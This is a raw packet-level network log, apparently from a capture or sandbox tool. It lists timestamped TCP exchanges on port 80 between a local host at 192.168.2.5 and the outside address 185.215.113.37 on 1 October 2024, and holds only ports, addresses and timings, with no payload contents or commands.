Oct 1, 2024 19:32:12.038603067 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038614035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038616896 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.038626909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038641930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.038651943 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.038674116 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.038703918 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038716078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038726091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038738966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038748026 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.038749933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038762093 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038774967 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.038775921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038788080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038789988 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.038819075 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.038842916 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.074996948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.075099945 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.075179100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.075191975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.075202942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.075220108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.075231075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.075232029 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.075242043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.075252056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.075257063 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.075263023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.075280905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.075292110 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.075303078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.075304985 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.075319052 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.075320005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.075331926 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.075341940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.075347900 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.075354099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.075371027 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.075372934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.075391054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.075402021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.075403929 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.075412035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.075417042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.075428963 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.075428963 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.075434923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.075440884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.075445890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.075450897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.075455904 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.075457096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.075463057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.075468063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.075489998 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.075508118 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.075547934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.075551033 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.075557947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.075568914 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.075579882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.075587034 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.075591087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.075602055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.075613976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.075614929 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.075634956 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.075659037 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.123869896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.123893976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.123903036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.123970032 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.123979092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.123989105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.123994112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.123996019 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.124005079 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124044895 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.124063969 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.124073982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124085903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124094963 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124099970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124109983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124124050 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.124154091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124157906 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.124165058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124175072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124186039 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.124197006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124206066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124207020 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.124217987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124229908 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.124245882 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.124248028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124258041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124277115 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.124293089 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.124322891 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.124344110 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124372005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124382019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124387026 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.124416113 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.124429941 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.124488115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124496937 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124506950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124517918 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124526024 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.124528885 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124540091 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.124569893 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.124583960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124623060 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.124643087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124655008 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124680996 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.124695063 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.124701977 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124711037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124722004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124732018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124737024 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.124752998 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.124772072 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.124803066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124814034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124825001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124835968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124838114 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.124861002 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124866009 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.124872923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124885082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124888897 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.124893904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124932051 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.124946117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124954939 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.124957085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124967098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124977112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.124983072 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.125000954 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.125015020 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.125092983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.125103951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.125113964 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.125123978 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.125132084 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.125137091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.125147104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.125157118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.125164032 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.125168085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.125186920 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.125193119 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.125197887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.125209093 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.125211954 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.125235081 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.125241041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.125251055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.125266075 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.125267982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.125278950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.125286102 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.125292063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.125303030 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.125303984 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.125315905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.125330925 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.125348091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.125349045 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.125359058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.125370026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.125371933 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.125390053 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.125417948 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.125473022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.125483990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.125494003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.125504971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.125514984 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.125515938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.125535965 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.125565052 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.125576019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.125587940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.125621080 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.379329920 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.384474039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.596510887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.596527100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.596538067 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.596549034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.596558094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.596569061 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.596579075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.596590042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.596595049 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.596601963 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.596611023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.596622944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.596635103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.596636057 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.596653938 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.596674919 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.596681118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.596704006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.596714020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.596719027 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.596729994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.596741915 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.596759081 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.596766949 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.596791983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.596803904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.596813917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.596827030 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.596833944 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.596837044 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.596842051 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.596865892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.596867085 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.596877098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.596887112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.596889019 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.596913099 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.596939087 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.596967936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.596978903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.596988916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.596999884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597007036 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.597011089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597019911 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.597038031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597048998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597054005 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.597059965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597071886 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597071886 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.597081900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597094059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597095013 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.597107887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597121000 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.597134113 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.597153902 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597157955 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.597166061 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597189903 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.597201109 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.597235918 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597248077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597259998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597275019 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.597285032 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.597297907 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.597338915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597349882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597359896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597371101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597377062 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.597383022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597387075 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.597407103 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.597431898 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.597449064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597460032 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597470045 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597481012 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597493887 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.597493887 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.597521067 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.597537994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597548962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597558022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597568989 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597575903 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.597587109 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597598076 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597599983 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.597609997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597620964 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597625971 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.597650051 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.597668886 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.597794056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597804070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597814083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597825050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597836018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597839117 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.597851992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597863913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597863913 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.597873926 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597876072 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.597884893 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597898960 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.597903967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597914934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597925901 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597927094 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.597935915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597944021 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.597948074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597959042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597965956 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.597970963 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.597987890 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598001003 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598011017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598022938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598022938 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598047972 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598056078 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598104000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598114014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598124981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598140001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598140955 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598151922 CEST	80	49704	185.215.113.37	192.168.2.5
